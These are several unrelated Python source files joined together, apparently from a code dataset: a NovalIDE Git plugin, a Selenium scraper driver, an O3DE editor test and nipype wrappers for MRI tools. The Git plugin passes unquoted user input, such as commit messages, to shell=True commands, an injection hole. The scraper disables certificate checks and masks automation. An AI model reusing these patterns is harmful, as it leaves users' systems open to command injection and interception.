def GetBranch(self):
error,output,returncode = self.CallGitProcess("git branch")
print (error,output,returncode,"============================")
if error and error.lower().find('fatal: not a git repository') != -1:
return None
else:
for line in output.splitlines():
if line.find('*') != -1:
return line.lstrip('*').strip()
return ''
def GetProjectDocument(self):
project_browser = self.GetProjectFrame()
return project_browser.GetView().GetDocument()
def GetProjectFrame(self):
return GetApp().MainFrame.GetView(consts.PROJECT_VIEW_NAME) | plugins/GitTool/gittool/__init__.py | from noval import _,GetApp,NewId
import os
import noval.iface as iface
import noval.plugin as plugin
import noval.util.utils as utils
import noval.constants as constants
from noval.project.templatemanager import ProjectTemplateManager
import gittool.gitui as gitui
import noval.consts as consts
import noval.menu as tkmenu
import subprocess
import noval.util.strutils as strutils
from tkinter import messagebox
import noval.ui_base as ui_base
import noval.ttkwidgets.checklistbox as checklistbox
import noval.ttkwidgets.treeviewframe as treeviewframe
import tkinter as tk
import noval.editor.text as texteditor
import noval.ttkwidgets.textframe as textframe
from tkinter import ttk,messagebox
import copy
class RepositoryAddrDialog(ui_base.CommonModaldialog):
def __init__(self,master,face_ui):
ui_base.CommonModaldialog.__init__(self,master)
self.title(_('Set repository remote addr'))
self.ui = face_ui
row = ttk.Frame(self.main_frame)
row.columnconfigure(1,weight=1)
ttk.Label(row,text=_('Repository addr:')).grid(column=0, row=0, sticky="nsew",padx=(0,consts.DEFAUT_CONTRL_PAD_X),pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
self.addr_var = tk.StringVar(value=self.GetRepositoryAddr())
name_entry = ttk.Entry(row,textvariable=self.addr_var)
name_entry.grid(column=1, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
row.pack(fill="x",expand=1)
self.AddokcancelButton()
def GetRepositoryAddr(self):
output = utils.GetCommandOutput("git remote -v",cwd=self.ui.GetProjectDocument().GetPath())
addr = ''
for line in output.splitlines():
if line.find('(push)') != -1:
addr = line.replace('(push)',"").replace('origin',"").strip()
return addr
def _ok(self,event=None):
if self.addr_var.get().strip() == "":
messagebox.showinfo(self,_('Please set repository addr'))
return
command = "git remote add origin %s"%(self.addr_var.get())
self.ui.CallGitProcess(command)
ui_base.CommonModaldialog._ok(self,event)
class GitConfigurationDialog(ui_base.CommonModaldialog):
def __init__(self,master,face_ui):
ui_base.CommonModaldialog.__init__(self,master)
self.ui = face_ui
self.title(_('Git Global Configuration'))
sizer_frame = ttk.Frame(self.main_frame)
sizer_frame.pack(fill="both",expand=1)
sizer_frame.columnconfigure(1,weight=1)
configs = {}
self.GetConfigs(configs)
ttk.Label(sizer_frame,text=_('User name:')).grid(column=0, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
self.user_name_var = tk.StringVar(value=configs['user_name'])
user_name_entry = ttk.Entry(sizer_frame,textvariable=self.user_name_var)
user_name_entry.grid(column=1, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X)
ttk.Label(sizer_frame,text=_('User email:')).grid(column=0, row=1, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
self.user_email_var = tk.StringVar(value=configs['user_email'])
user_email_entry = ttk.Entry(sizer_frame,textvariable=self.user_email_var)
user_email_entry.grid(column=1, row=1, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X)
self.AddokcancelButton()
self.quote_path_var = tk.BooleanVar(value=configs.get('quotepath',True))
ttk.Checkbutton(sizer_frame,text=("Use Quote Path"),variable=self.quote_path_var).grid(column=0, row=2, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
self.golbal_chk_var = tk.BooleanVar(value=True)
ttk.Checkbutton(sizer_frame,text=("Apply to global domain"),variable=self.golbal_chk_var).grid(column=0, row=3, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0))
def _ok(self,event=None):
if self.user_name_var.get().strip() == "":
messagebox.showinfo(self,_('Please set git user name'))
return
if self.user_email_var.get().strip() == "":
messagebox.showinfo(self,_('Please set git user email'))
return
command = "git config "
if self.golbal_chk_var.get():
command += "--global "
command += "user.name \"%s\""%self.user_name_var.get()
self.ui.CallGitProcess(command)
command = "git config "
if self.golbal_chk_var.get():
command += "--global "
command += "user.email \"%s\""%self.user_email_var.get()
self.ui.CallGitProcess(command)
if self.quote_path_var.get():
quote_path = "true"
else:
quote_path = "false"
self.ui.CallGitProcess('git config --global core.quotepath %s'%quote_path)
ui_base.CommonModaldialog._ok(self,event)
def GetConfigs(self,configs = {}):
output = utils.GetCommandOutput("git config -l")
for line in output.splitlines():
if line.find('user.name') != -1:
user_name = line.replace('user.name=',"").strip()
configs['user_name'] = user_name
elif line.find('user.email') != -1:
user_email = line.replace('user.email=',"").strip()
configs['user_email'] = user_email
elif line.find('core.quotepath') != -1:
quotepath = line.replace('core.quotepath=',"").strip()
configs['quotepath'] = True if quotepath=="true" else False
class CommitDialog(ui_base.CommonModaldialog):
def __init__(self,master,branch,content,single_file=False,commit=True):
ui_base.CommonModaldialog.__init__(self,master,width=1000)
if commit:
self.title(_('Commit-[%s]'%branch))
else:
self.title(_('Checkout-[%s]'%branch))
commit_file_label = ttk.Label(self.main_frame)
commit_file_label.pack(fill="x")
check_listbox_view = treeviewframe.TreeViewFrame(self.main_frame,treeview_class=checklistbox.CheckListbox,borderwidth=1,relief="solid",height=10)
self.listbox = check_listbox_view.tree
check_listbox_view.pack(fill="x",expand=1)
sizer_frame = ttk.Frame(self.main_frame)
sizer_frame.pack(fill="x",expand=1)
select_all_btn = ttk.Button(
sizer_frame, text=_("Select All"), command=self.SelectAll
)
select_all_btn.grid(column=0, row=0, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y, 0))
unselect_all_btn = ttk.Button(
sizer_frame, text=_("UnSelect All"), command=self.UnselectAll
)
unselect_all_btn.grid(column=1, row=0, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y, 0))
modify_flag = 'modified:'
delete_flag = 'deleted:'
unstaged_file = False
self.is_commit = commit
commit_file_count = 0
unstaged_file_count = 0
encoding = utils.get_default_encoding()
if not single_file:
for line in content.splitlines():
try:
line = line.encode(encoding,'ignore').decode('utf-8')
except:
line = line
if line.find(modify_flag) != -1:
i = self.listbox.Append(line.replace(modify_flag,"").strip())
self.listbox.Check(i)
commit_file_count += 1
elif line.find(delete_flag) != -1:
i = self.listbox.Append(line.replace(delete_flag,"").strip())
self.listbox.Check(i)
commit_file_count += 1
elif line.find('Untracked files:') != -1:
unstaged_file = True
elif unstaged_file and line.find('git add <file>...') == -1 and line.find('no changes added to commit') == -1 and line.find('nothing added to commit') == -1 and commit:
if line.strip():
self.listbox.Append(line.strip())
unstaged_file_count += 1
else:
i = self.listbox.Append(content)
self.listbox.Check(i)
commit_file_count += 1
if self.is_commit:
commit_file_label.configure(text=_('Commit files %d,Unstaged files %d')%(commit_file_count,unstaged_file_count))
ttk.Label(self.main_frame,text=_('Commit message')).pack(fill="x")
text_frame = textframe.TextFrame(self.main_frame,borderwidth=1,relief="solid",text_class=texteditor.TextCtrl,height=12)
text_frame.pack(fill="x",expand=1)
self.text = text_frame.text
ttk.Button(self.main_frame, text=_("Commit and Push"), command=self.CommitAndPush).pack(side=tk.LEFT)
self.AddokcancelButton(side=tk.LEFT)
self.ok_button.configure(text=_('Commit'),default="active")
else:
commit_file_label.configure(text=_('Commit files %d')%(commit_file_count))
self.AddokcancelButton()
self.ok_button.configure(text=_('Checkout'),default="active")
self.files = []
self.msg = ''
self.push = False
def SelectAll(self):
self.CheckListbox(True)
def CheckListbox(self,check=True):
for i in range(self.listbox.GetCount()):
self.listbox.Check(i,check)
def UnselectAll(self):
self.CheckListbox(False)
def CommitAndPush(self):
self.push = True
self._ok()
def GetFiles(self):
files = []
for i in range(self.listbox.GetCount()):
if self.listbox.IsChecked(i):
files.append(self.listbox.GetString(i))
return files
def _ok(self,event=None):
self.files = self.GetFiles()
if 0 == len(self.files):
messagebox.showinfo(self,_('Please select at least one file'))
return
if self.is_commit:
self.msg = self.text.GetValue()
if self.msg.strip() == '':
messagebox.showinfo(self,_('commit message could not be empty'))
return
ui_base.CommonModaldialog._ok(self,event)
class GitToolPlugin(plugin.Plugin):
"""plugin description here..."""
plugin.Implements(iface.MainWindowI)
MAX_COMMAND_LINE_LENGTH = 10000
def PlugIt(self, parent):
"""Hook the calculator into the menu and bind the event"""
utils.get_logger().info("Installing GitTool plugin")
ProjectTemplateManager().AddProjectTemplate("General",_("New Project From Git Server"),[(gitui.GitProjectNameLocationPage,{'project_dir_checked':False,'enable_create_project_dir':False}),gitui.LocationSelectionPage,gitui.RepositorySourcePage,\
gitui.BranchSelectionPage,gitui.LocalDestinationPage,gitui.ImportGitfilesPage])
GetApp().bind(constants.PROJECTVIEW_POPUP_FILE_MENU_EVT, self.AppenFileMenu,True)
GetApp().bind(constants.PROJECTVIEW_POPUP_ROOT_MENU_EVT, self.AppenRootMenu,True)
self.project_browser = GetApp().MainFrame.GetView(consts.PROJECT_VIEW_NAME)
GetApp().AddMessageCatalog('gittool', __name__)
self.current_branch = None
def GetMinVersion(self):
"""Override in subclasses to return the minimum version of novalide that
the plugin is compatible with. By default it will return the current
version of novalide.
@return: version str
"""
return "1.2.2"
def InstallHook(self):
"""Override in subclasses to allow the plugin to be loaded
dynamically.
@return: None
"""
pass
def UninstallHook(self):
pass
def EnableHook(self):
pass
def DisableHook(self):
pass
def GetFree(self):
return True
def GetPrice(self):
pass
def MatchPlatform(self):
'''
这里插件需要区分windows版本和linux版本
windows版本把adkpass.exe包需要打包进去
linux版本把可执行脚本adkpass.py包需要打包进去
'''
return True
def AppenRootMenu(self, event):
self.current_branch = self.GetBranch()
print ('current branch is ',self.current_branch)
menu = event.get('menu')
submenu = tkmenu.PopupMenu()
menu.AppendMenu(NewId(),_("Version Control"),submenu)
if self.current_branch is None:
submenu.Append(NewId(),_("Init"),handler=self.Init)
else:
submenu.Append(NewId(),_("Checkout files"),handler=self.CheckoutCommitFiles)
submenu.Append(NewId(),_("Ignore files"),handler=self.AddIgnoreFiles)
submenu.Append(NewId(),_("Pull"),handler=self.Pull)
submenu.Append(NewId(),_("Commit"),handler=self.Commit)
submenu.Append(NewId(),_("Push"),handler=self.Push)
branch_menu = tkmenu.PopupMenu()
submenu.AppendMenu(NewId(),_("Branch"),branch_menu)
branch_menu.Append(NewId(),_("Checkout branch"),handler=self.CheckoutBranch)
branch_menu.Append(NewId(),_("New branch"),handler=self.NewBranch)
branch_menu.Append(NewId(),_("Delete branch"),handler=self.NewBranch)
remote_menu = tkmenu.PopupMenu()
submenu.AppendMenu(NewId(),_("Remote"),remote_menu)
remote_menu.Append(NewId(),_("Set Remote Url"),handler=self.SetRemoteUrl)
submenu.Append(NewId(),_("Configuration"),handler=self.Configuration)
def SetRemoteUrl(self):
RepositoryAddrDialog(GetApp().MainFrame,self).ShowModal()
def Configuration(self):
GitConfigurationDialog(GetApp().MainFrame,self).ShowModal()
def Init(self):
command = "git init"
error,output,returncode = self.CallGitProcess(command)
def CheckoutBranch(self):
pass
def GetCommandOutput(self,command):
output = utils.GetCommandOutput('git status',cwd=self.GetProjectDocument().GetPath())
if output == '':
output = utils.GetCommandOutput('git status',cwd=self.GetProjectDocument().GetPath(),encoding='utf-8')
return output
def CheckoutCommitFiles(self):
output = self.GetCommandOutput('git status')
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,output,commit=False)
if dlg.ShowModal() == constants.ID_CANCEL:
return
self.Checkoutfiles(dlg.files)
def AddIgnoreFiles(self):
pass
def NewBranch(self):
pass
def Pull(self):
command = "git pull"
error,output,returncode = self.CallGitProcess(command)
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('pull success'))
else:
messagebox.showinfo(_('Error'),_('pull fail:%s')%(error))
def Push(self):
error,output,returncode = self.CallGitProcess("git push origin %s"%self.current_branch,ask_pass=True)
if returncode != 0:
messagebox.showerror(_('Push fail'),error)
return
messagebox.showinfo(GetApp().GetAppName(),_('Push success'))
def Commit(self):
output = self.GetCommandOutput('git status')
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,output)
if dlg.ShowModal() == constants.ID_CANCEL:
return
files = dlg.files
command = 'git add'
for commit_file in files:
command += ' ' + commit_file
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
command = 'git commit -m %s'%dlg.msg
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
if dlg.push:
self.Push()
else:
messagebox.showinfo(GetApp().GetAppName(),_('Commit success'))
def AppenFileMenu(self, event):
self.current_branch = self.GetBranch()
menu = event.get('menu')
tree_item = event.get('item')
project_browser = self.GetProjectFrame()
filePath = project_browser.GetView()._GetItemFilePath(tree_item)
submenu = tkmenu.PopupMenu()
menu.AppendMenu(NewId(),_("Version Control"),submenu)
submenu.Append(NewId(),_("Commit"),handler=lambda:self.Commitfile(filePath))
submenu.Append(NewId(),_("Checkout"),handler=lambda:self.Checkoutfile(filePath))
submenu.Append(NewId(),_("Push"),handler=self.Pushfile)
submenu.Append(NewId(),_("Add to ignore"),handler=self.AddIgnoreFile)
submenu.Append(NewId(),_("Add"),handler=lambda:self.AddFile(filePath))
submenu.Append(NewId(),_("Remove"),handler=lambda:self.RemoveFile(filePath))
submenu.Append(NewId(),_("Delete"),handler=lambda:self.DeleteFile(filePath))
def Checkoutfile(self,filepath):
self.Checkoutfiles([filepath])
def Checkoutfiles(self,files):
ret = messagebox.askquestion(GetApp().GetAppName(),_('Checkout file will overwrite current file content,Are you sure to checkout?'))
if not ret:
return
for filepath in files:
error,output,returncode = self.CallGitProcess("git checkout %s"%strutils.emphasis_path(filepath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('checkout success'))
else:
messagebox.showinfo(_('Error'),_('checkout fail:%s')%(error))
def AddIgnoreFile(self):
pass
def AddFile(self,filePath):
error,output,returncode = self.CallGitProcess("git add %s"%strutils.emphasis_path(filePath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('add success'))
else:
messagebox.showinfo(_('Error'),_('add fail:%s')%(error))
return returncode
def RemoveFile(self,filePath):
self.GetProjectDocument().GetFirstView().RemoveFromProject()
def DeleteFile(self,filePath):
error,output,returncode = self.CallGitProcess('git rm %s'%strutils.emphasis_path(filePath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('delete success'))
else:
messagebox.showinfo(_('Error'),_('delete fail:%s')%(error))
return
self.RemoveFile(filePath)
def Commitfile(self,filePath):
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,filePath,single_file=True)
if dlg.ShowModal() == constants.ID_CANCEL:
return
returncode = self.AddFile(filePath)
if returncode != 0:
return
command = 'git commit -m %s'%dlg.msg
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
else:
messagebox.showinfo(GetApp().GetAppName(),_('commit success'))
def Pushfile(self):
self.Push()
def CallGitProcess(self,command,ask_pass=False):
utils.get_logger().debug('git command is %s,length is:%d',command,len(command))
if len(command) >= self.MAX_COMMAND_LINE_LENGTH:
return "command line length exceed limit....","",-1
env = copy.copy(os.environ)
if ask_pass:
ask_pass_path = gitui.GetAskPassPath()
env.update(dict(GIT_ASKPASS=ask_pass_path))
p = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,\
cwd=self.GetProjectDocument().GetPath(),env=env)
error = str(p.stderr.read(),encoding = utils.get_default_encoding())
try:
output = str(p.stdout.read(),encoding = utils.get_default_encoding())
except:
output = str(p.stdout.read(),encoding = 'utf-8')
p.wait()
return error,output,p.returncode
def GetBranch(self):
error,output,returncode = self.CallGitProcess("git branch")
print (error,output,returncode,"============================")
if error and error.lower().find('fatal: not a git repository') != -1:
return None
else:
for line in output.splitlines():
if line.find('*') != -1:
return line.lstrip('*').strip()
return ''
def GetProjectDocument(self):
project_browser = self.GetProjectFrame()
return project_browser.GetView().GetDocument()
def GetProjectFrame(self):
return GetApp().MainFrame.GetView(consts.PROJECT_VIEW_NAME) | 0.175679 | 0.043043 |
import os
import traceback
from selenium import webdriver
from selenium_stealth import stealth
from scraping_the_world.scrapers.webdriver_manager.webdriver_toolkit import WebDriverToolKit
from scraping_the_world.models.querys import add_log
from env import ENV
WEBDRIVERS_PATH = os.path.dirname(os.path.realpath(__file__))
class SingletonMeta(type):
"""
The Singleton class can be implemented in different ways in Python. Some
possible methods include: base class, decorator, metaclass. We will use the
metaclass because it is best suited for this purpose.
"""
_instances = {}
def __call__(cls, *args, **kwargs):
"""
Possible changes to the value of the `__init__` argument do not affect
the returned instance.
"""
if cls not in cls._instances:
instance = super().__call__(*args, **kwargs)
cls._instances[cls] = instance
return cls._instances[cls]
class WebdriverManager(metaclass=SingletonMeta):
def __init__(self):
self.__driver = None
def get_driver(self):
if not self.__driver:
self.__driver = self.create_driver()
wdtk = WebDriverToolKit(self.__driver)
return self.__driver, wdtk
def create_driver(self):
try:
options = self.__get_options()
if ENV['ENV'] == 'DEV':
if int(ENV['SELENIUM_REMOTE']) == 1:
self.__driver = webdriver.Remote(command_executor='http://localhost:4444/wd/hub', options=options)
else:
webdriver_path = f'{WEBDRIVERS_PATH}\\chromedriver'
self.__driver = webdriver.Chrome(executable_path=webdriver_path, options=options)
stealth(driver=self.__driver,
languages=["en-US", "en"],
vendor="Google Inc.",
platform="Win32",
webgl_vendor="Intel Inc.",
renderer="Intel Iris OpenGL Engine",
fix_hairline=True,
)
else:
self.__driver = webdriver.Remote(command_executor='http://container_selenium:4444/wd/hub', options=options)
self.__driver.maximize_window()
return self.__driver
except:
traceback.print_exc()
add_log(log_text=f'[WebdriverManager] Traceback: {traceback.format_exc()}', log_type='ERROR')
@staticmethod
def __get_options():
options = webdriver.ChromeOptions()
options.add_argument('--ignore-ssl-errors=yes')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--incognito')
options.add_argument('--no-sandbox')
options.add_argument('--disable-blink-features=AutomationControlled')
options.add_argument('--enable-automation')
options.add_argument('--disable-dev-shm-usage')
options.add_argument('--disable-extensions')
options.add_argument('--disable-gpu')
options.add_experimental_option('useAutomationExtension', False)
options.add_experimental_option("excludeSwitches", ["enable-automation"])
# options.add_argument(
# '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36')
# options.add_argument('--headless')
return options
def driver_quit(self):
try:
if self.__driver:
self.__driver.quit()
self.__driver = None
except:
traceback.print_exc()
add_log(log_text=f'[WebdriverManager] Traceback: {traceback.format_exc()}', log_type='ERROR') | scraping_the_world/scrapers/webdriver_manager/webdriver_manager.py | import os
import traceback
from selenium import webdriver
from selenium_stealth import stealth
from scraping_the_world.scrapers.webdriver_manager.webdriver_toolkit import WebDriverToolKit
from scraping_the_world.models.querys import add_log
from env import ENV
WEBDRIVERS_PATH = os.path.dirname(os.path.realpath(__file__))
class SingletonMeta(type):
"""
The Singleton class can be implemented in different ways in Python. Some
possible methods include: base class, decorator, metaclass. We will use the
metaclass because it is best suited for this purpose.
"""
_instances = {}
def __call__(cls, *args, **kwargs):
"""
Possible changes to the value of the `__init__` argument do not affect
the returned instance.
"""
if cls not in cls._instances:
instance = super().__call__(*args, **kwargs)
cls._instances[cls] = instance
return cls._instances[cls]
class WebdriverManager(metaclass=SingletonMeta):
def __init__(self):
self.__driver = None
def get_driver(self):
if not self.__driver:
self.__driver = self.create_driver()
wdtk = WebDriverToolKit(self.__driver)
return self.__driver, wdtk
def create_driver(self):
try:
options = self.__get_options()
if ENV['ENV'] == 'DEV':
if int(ENV['SELENIUM_REMOTE']) == 1:
self.__driver = webdriver.Remote(command_executor='http://localhost:4444/wd/hub', options=options)
else:
webdriver_path = f'{WEBDRIVERS_PATH}\\chromedriver'
self.__driver = webdriver.Chrome(executable_path=webdriver_path, options=options)
stealth(driver=self.__driver,
languages=["en-US", "en"],
vendor="Google Inc.",
platform="Win32",
webgl_vendor="Intel Inc.",
renderer="Intel Iris OpenGL Engine",
fix_hairline=True,
)
else:
self.__driver = webdriver.Remote(command_executor='http://container_selenium:4444/wd/hub', options=options)
self.__driver.maximize_window()
return self.__driver
except:
traceback.print_exc()
add_log(log_text=f'[WebdriverManager] Traceback: {traceback.format_exc()}', log_type='ERROR')
@staticmethod
def __get_options():
options = webdriver.ChromeOptions()
options.add_argument('--ignore-ssl-errors=yes')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--incognito')
options.add_argument('--no-sandbox')
options.add_argument('--disable-blink-features=AutomationControlled')
options.add_argument('--enable-automation')
options.add_argument('--disable-dev-shm-usage')
options.add_argument('--disable-extensions')
options.add_argument('--disable-gpu')
options.add_experimental_option('useAutomationExtension', False)
options.add_experimental_option("excludeSwitches", ["enable-automation"])
# options.add_argument(
# '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36')
# options.add_argument('--headless')
return options
def driver_quit(self):
try:
if self.__driver:
self.__driver.quit()
self.__driver = None
except:
traceback.print_exc()
add_log(log_text=f'[WebdriverManager] Traceback: {traceback.format_exc()}', log_type='ERROR') | 0.435661 | 0.048926 |
import os, sys
sys.path.append(os.path.dirname(__file__))
from Editor_TestClass import BaseClass
class Editor_DisplaySettingsBus_Work(BaseClass):
# Description:
# Tests the Python API from DisplaySettingsPythonFuncs.cpp while the Editor is running
@staticmethod
def test():
import azlmbr.bus as bus
import azlmbr.display_settings as display_settings
check_result = BaseClass.check_result
# Retrieve current settings
existingState = display_settings.DisplaySettingsBus(bus.Broadcast, 'GetSettingsState')
# Alter settings
alteredState = azlmbr.object.create('DisplaySettingsState')
alteredState.no_collision = False
alteredState.no_labels = False
alteredState.simulate = True
alteredState.hide_tracks = False
alteredState.hide_links = False
alteredState.hide_helpers = False
alteredState.show_dimension_figures = True
# Set altered settings
display_settings.DisplaySettingsBus(bus.Broadcast, 'SetSettingsState', alteredState)
# Get settings again
newState = display_settings.DisplaySettingsBus(bus.Broadcast, 'GetSettingsState')
# Check if the setter worked
check_result(alteredState.no_collision == newState.no_collision, 'alteredState.no_collision')
check_result(alteredState.no_labels == newState.no_labels, 'alteredState.no_labels')
check_result(alteredState.simulate == newState.simulate, 'alteredState.simulate')
check_result(alteredState.hide_tracks == newState.hide_tracks, 'alteredState.hide_tracks')
check_result(alteredState.hide_links == newState.hide_links, 'alteredState.hide_links')
check_result(alteredState.hide_helpers == newState.hide_helpers, 'alteredState.hide_helpers')
check_result(alteredState.show_dimension_figures == newState.show_dimension_figures, 'alteredState.show_dimension_figures')
# Restore previous settings
display_settings.DisplaySettingsBus(bus.Broadcast, 'SetSettingsState', existingState)
if __name__ == "__main__":
tester = Editor_DisplaySettingsBus_Work()
tester.test_case(tester.test, level="TestDependenciesLevel") | AutomatedTesting/Gem/PythonTests/EditorPythonBindings/tests/Editor_DisplaySettingsBus_Work.py | import os, sys
sys.path.append(os.path.dirname(__file__))
from Editor_TestClass import BaseClass
class Editor_DisplaySettingsBus_Work(BaseClass):
# Description:
# Tests the Python API from DisplaySettingsPythonFuncs.cpp while the Editor is running
@staticmethod
def test():
import azlmbr.bus as bus
import azlmbr.display_settings as display_settings
check_result = BaseClass.check_result
# Retrieve current settings
existingState = display_settings.DisplaySettingsBus(bus.Broadcast, 'GetSettingsState')
# Alter settings
alteredState = azlmbr.object.create('DisplaySettingsState')
alteredState.no_collision = False
alteredState.no_labels = False
alteredState.simulate = True
alteredState.hide_tracks = False
alteredState.hide_links = False
alteredState.hide_helpers = False
alteredState.show_dimension_figures = True
# Set altered settings
display_settings.DisplaySettingsBus(bus.Broadcast, 'SetSettingsState', alteredState)
# Get settings again
newState = display_settings.DisplaySettingsBus(bus.Broadcast, 'GetSettingsState')
# Check if the setter worked
check_result(alteredState.no_collision == newState.no_collision, 'alteredState.no_collision')
check_result(alteredState.no_labels == newState.no_labels, 'alteredState.no_labels')
check_result(alteredState.simulate == newState.simulate, 'alteredState.simulate')
check_result(alteredState.hide_tracks == newState.hide_tracks, 'alteredState.hide_tracks')
check_result(alteredState.hide_links == newState.hide_links, 'alteredState.hide_links')
check_result(alteredState.hide_helpers == newState.hide_helpers, 'alteredState.hide_helpers')
check_result(alteredState.show_dimension_figures == newState.show_dimension_figures, 'alteredState.show_dimension_figures')
# Restore previous settings
display_settings.DisplaySettingsBus(bus.Broadcast, 'SetSettingsState', existingState)
if __name__ == "__main__":
tester = Editor_DisplaySettingsBus_Work()
tester.test_case(tester.test, level="TestDependenciesLevel") | 0.327131 | 0.121217 |
import os
from glob import glob
from traits.api import *
import nibabel as nib
from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import traits, isdefined, CommandLine, CommandLineInputSpec,\
TraitedSpec, File, InputMultiPath, OutputMultiPath, BaseInterface, BaseInterfaceInputSpec
from pymialsrtk.interfaces.utils import run
#
## NLM denoising
#
class BtkNLMDenoisingInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=False)
out_postfix = traits.Str("_nlm", usedefault=True)
weight = traits.Float(0.1,desc='NLM weight (0.1 by default)')
class BtkNLMDenoisingOutputSpec(TraitedSpec):
out_file = File(desc='Denoised image')
class BtkNLMDenoising(BaseInterface):
input_spec = BtkNLMDenoisingInputSpec
output_spec = BtkNLMDenoisingOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
#Version from MIAL/mialsuperresolutiontoolkit with no docker
#out_file = os.path.join(self.inputs.bids_dir, ''.join((name, self.inputs.out_postfix, ext)))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
uid = os.getuid()
gid = os.getgid()
cmd = []
cmd.append("docker run --rm -u {}:{}".format(uid,gid))
cmd.append("--volumes-from sinapp_nlmdenoise")
cmd.append("sebastientourbier/mialsuperresolutiontoolkit btkNLMDenoising")
cmd.append("-i {} -o {} -b {}".format(self.inputs.in_file,out_file,self.inputs.weight))
if self.inputs.in_mask:
cmd.append("-m {}".format(self.inputs.in_mask))
try:
print('... cmd: {}'.format(cmd))
p = run(' '.join(cmd), env={}, cwd=os.path.abspath(self.inputs.bids_dir))
print(p)
except:
print('Failed')
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
#Version from MIAL/mialsuperresolutiontoolkit with no docker
#outputs['out_file'] = os.path.join(self.inputs.bids_dir, ''.join((name, self.inputs.out_postfix, ext)))
outputs['out_file'] = os.path.join(os.getcwd(), ''.join((name, self.inputs.out_postfix, ext)))
return outputs
class MultipleBtkNLMDenoisingInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
input_images = InputMultiPath(File(desc='files to be denoised', mandatory = True))
input_masks = InputMultiPath(File(desc='mask of files to be denoised', mandatory = False))
weight = traits.Float(0.1)
out_postfix = traits.Str("_nlm", usedefault=True)
class MultipleBtkNLMDenoisingOutputSpec(TraitedSpec):
output_images = OutputMultiPath(File())
class MultipleBtkNLMDenoising(BaseInterface):
input_spec = MultipleBtkNLMDenoisingInputSpec
output_spec = MultipleBtkNLMDenoisingOutputSpec
def _run_interface(self, runtime):
if len(self.inputs.input_masks)>0:
for input_image, input_mask in zip(self.inputs.input_images,self.inputs.input_masks):
ax = BtkNLMDenoising(bids_dir = self.inputs.bids_dir, in_file = input_image, in_mask = input_mask, out_postfix=self.inputs.out_postfix, weight = self.inputs.weight)
ax.run()
else:
for input_image in self.inputs.input_images:
ax = BtkNLMDenoising(bids_dir = self.inputs.bids_dir, in_file = input_image, out_postfix=self.inputs.out_postfix, weight = self.inputs.weight)
ax.run()
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs['output_images'] = glob(os.path.abspath("*.nii.gz"))
return outputs
#
## Slice intensity correction
#
class MialsrtkCorrectSliceIntensityInputSpec(BaseInterfaceInputSpec):
bids_dir = Directory(desc='BIDS root directory',mandatory=True,exists=True)
in_file = File(desc='Input image',mandatory=True)
in_mask = File(desc='Input mask',mandatory=False)
out_postfix = traits.Str("_csi", usedefault=True)
class MialsrtkCorrectSliceIntensityOutputSpec(TraitedSpec):
out_file = File(desc='Corrected slice intensities')
class MialsrtkCorrectSliceIntensity(BaseInterface):
input_spec = MialsrtkCorrectSliceIntensityInputSpec
output_spec = MialsrtkCorrectSliceIntensityOutputSpec
def _run_interface(self, runtime):
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
out_file = os.path.join(os.getcwd().replace(self.inputs.bids_dir,'/fetaldata'), ''.join((name, self.inputs.out_postfix, ext)))
cmd = 'mialsrtkCorrectSliceIntensity "{}" "{}" "{}"'.format(self.inputs.in_file,self.inputs.in_mask,out_file)
try:
print('... cmd: {}'.format(cmd))
run(self, cmd, env={}, cwd=os.path.abspath(self.inputs.bids_dir))
except:
print('Failed')
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
_, name, ext = split_filename(os.path.abspath(self.inputs.in_file))
